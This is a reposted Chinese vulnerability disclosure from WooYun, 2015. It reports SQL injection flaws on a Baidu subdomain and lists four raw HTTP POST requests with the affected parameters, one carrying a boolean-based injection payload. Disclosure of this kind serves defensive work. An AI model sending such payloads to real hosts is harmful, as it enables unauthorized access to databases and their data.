记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

百度某子域多处SQL注射

2015-03-28 14:00

1、

POST /report/getReportList HTTP/1.1

Host: baitong.baidu.com



app_id=135594&date_from=2015-02-02&date_to=2015-02-09'||(true and 1=1) limit 2#&type=line





date_from 和 date_to



2、POST /statistics/line HTTP/1.1

Host: baitong.baidu.com



begin=2015-02-03&end=2015-02-09&type=1



begin 和 end



3、POST /statistics/table HTTP/1.1

Host: baitong.baidu.com



sEcho=1&iColumns=4&sColumns=app_name%2Cdownload_num%2Cmoney_num%2C&iDisplayStart=0&iDisplayLength=10&mDataProp_0=app_name&mDataProp_1=download_num&mDataProp_2=money_num&mDataProp_3=3&iSortingCols=1&iSortCol_0=0&sSortDir_0=asc&bSortable_0=false&bSortable_1=true&bSortable_2=true&bSortable_3=false&begin=2015-02-03&end=2015-02-09&type=1



中多个参数



4、

POST /report/getReportDetail HTTP/1.1

Host: baitong.baidu.com



sEcho=2&iColumns=3&sColumns=adt_adv_name%2Cadt_download_num%2Cadt_actual_income&iDisplayStart=0&iDisplayLength=10&mDataProp_0=adt_adv_name&mDataProp_1=adt_download_num&mDataProp_2=adt_actual_income&iSortingCols=1&iSortCol_0=2&sSortDir_0=asc&bSortable_0=false&bSortable_1=true&bSortable_2=true&app_id=135594&date=2015-02-02'





中多个参数

漏洞证明:

1.png

修复方案:

过滤


知识来源: www.wooyun.org/bugs/wooyun-2015-096745

阅读:107724 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“百度某子域多处SQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云